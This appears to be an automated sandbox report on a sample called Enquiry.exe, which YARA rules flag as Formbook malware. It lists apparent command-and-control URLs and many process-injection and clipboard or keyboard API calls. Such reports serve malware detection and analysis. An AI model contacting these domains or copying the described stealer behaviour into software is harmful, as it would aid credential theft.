@HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Mon, 23 Sep 2024 12:56:24 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Mon, 23 Sep 2024 12:56:27 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 693connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
            Source: RmClient.exe, 00000006.00000002.3535415896.0000000004AAE000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3534352308.0000000003EFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nakama2-sshl.xyz/ui3j/?3jE8o=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd
            Source: RmClient.exe, 00000006.00000002.3535415896.00000000042D4000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3534352308.0000000003724000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2304214880.000000003ADE4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/7mju/?oB=mVppHlHxM&3jE8o=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/F
            Source: lOHjHqJCgqObv.exe, 00000007.00000002.3536218795.00000000057DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.healthyloveforall.net
            Source: lOHjHqJCgqObv.exe, 00000007.00000002.3536218795.00000000057DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.healthyloveforall.net/u6k6/
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RmClient.exe, 00000006.00000002.3535415896.00000000045F8000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3534352308.0000000003A48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: RmClient.exe, 00000006.00000002.3533246555.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RmClient.exe, 00000006.00000002.3533246555.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RmClient.exe, 00000006.00000002.3533246555.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RmClient.exe, 00000006.00000002.3533246555.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RmClient.exe, 00000006.00000002.3533246555.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RmClient.exe, 00000006.00000002.3533246555.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RmClient.exe, 00000006.00000003.2177912553.000000000812C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RmClient.exe, 00000006.00000002.3537324364.00000000066F0000.00000004.00000800.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.3535415896.000000000478A000.00000004.10000000.00040000.00000000.sdmp, lOHjHqJCgqObv.exe, 00000007.00000002.3534352308.0000000003BDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: RmClient.exe, 00000006.00000003.2187886773.000000000814E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Enquiry.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C433 NtClose,1_2_0042C433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,1_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074340 NtSetContextThread,1_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074650 NtSuspendThread,1_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B80 NtQueryInformationFile,1_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BA0 NtEnumerateValueKey,1_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BE0 NtQueryValueKey,1_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BF0 NtAllocateVirtualMemory,1_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AB0 NtWaitForSingleObject,1_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AD0 NtReadFile,1_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AF0 NtWriteFile,1_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F30 NtCreateSection,1_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F60 NtCreateProcessEx,1_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F90 NtProtectVirtualMemory,1_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FA0 NtQuerySection,1_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FB0 NtResumeThread,1_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FE0 NtCreateFile,1_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E30 NtWriteVirtualMemory,1_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E80 NtReadVirtualMemory,1_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EA0 NtAdjustPrivilegesToken,1_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EE0 NtQueueApcThread,1_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D00 NtSetInformationFile,1_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D10 NtMapViewOfSection,1_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D30 NtUnmapViewOfSection,1_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DB0 NtEnumerateKey,1_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DD0 NtDelayExecution,1_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C00 NtQueryInformationProcess,1_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C60 NtCreateKey,1_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CA0 NtQueryInformationToken,1_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CC0 NtQueryVirtualMemory,1_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CF0 NtOpenProcess,1_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073010 NtOpenDirectoryObject,1_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073090 NtSetValueKey,1_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030739B0 NtGetContextThread,1_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D10 NtOpenProcessToken,1_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D70 NtOpenThread,1_2_03073D70
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03934340 NtSetContextThread,LdrInitializeThunk,6_2_03934340
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03934650 NtSuspendThread,LdrInitializeThunk,6_2_03934650
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03932BA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03932BF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03932BE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932B60 NtClose,LdrInitializeThunk,6_2_03932B60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932AD0 NtReadFile,LdrInitializeThunk,6_2_03932AD0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932AF0 NtWriteFile,LdrInitializeThunk,6_2_03932AF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932FB0 NtResumeThread,LdrInitializeThunk,6_2_03932FB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932FE0 NtCreateFile,LdrInitializeThunk,6_2_03932FE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932F30 NtCreateSection,LdrInitializeThunk,6_2_03932F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03932E80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03932EE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932DD0 NtDelayExecution,LdrInitializeThunk,6_2_03932DD0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03932DF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03932D10
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03932D30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03932CA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03932C70
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932C60 NtCreateKey,LdrInitializeThunk,6_2_03932C60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039335C0 NtCreateMutant,LdrInitializeThunk,6_2_039335C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_039339B0 NtGetContextThread,LdrInitializeThunk,6_2_039339B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932B80 NtQueryInformationFile,6_2_03932B80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932AB0 NtWaitForSingleObject,6_2_03932AB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932F90 NtProtectVirtualMemory,6_2_03932F90
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932FA0 NtQuerySection,6_2_03932FA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932F60 NtCreateProcessEx,6_2_03932F60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932EA0 NtAdjustPrivilegesToken,6_2_03932EA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932E30 NtWriteVirtualMemory,6_2_03932E30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932DB0 NtEnumerateKey,6_2_03932DB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932D00 NtSetInformationFile,6_2_03932D00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932CC0 NtQueryVirtualMemory,6_2_03932CC0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932CF0 NtOpenProcess,6_2_03932CF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03932C00 NtQueryInformationProcess,6_2_03932C00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03933090 NtSetValueKey,6_2_03933090
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03933010 NtOpenDirectoryObject,6_2_03933010
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03933D10 NtOpenProcessToken,6_2_03933D10
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03933D70 NtOpenThread,6_2_03933D70
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F58EF0 NtReadFile,6_2_02F58EF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F58FE0 NtDeleteFile,6_2_02F58FE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F58D80 NtCreateFile,6_2_02F58D80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F59080 NtClose,6_2_02F59080
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_02F591E0 NtAllocateVirtualMemory,6_2_02F591E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375F0E9 NtQueryInformationProcess,6_2_0375F0E9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0375FA38 NtSetContextThread,6_2_0375FA38
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\Enquiry.exeCode function: 0_2_00411E780_2_00411E78
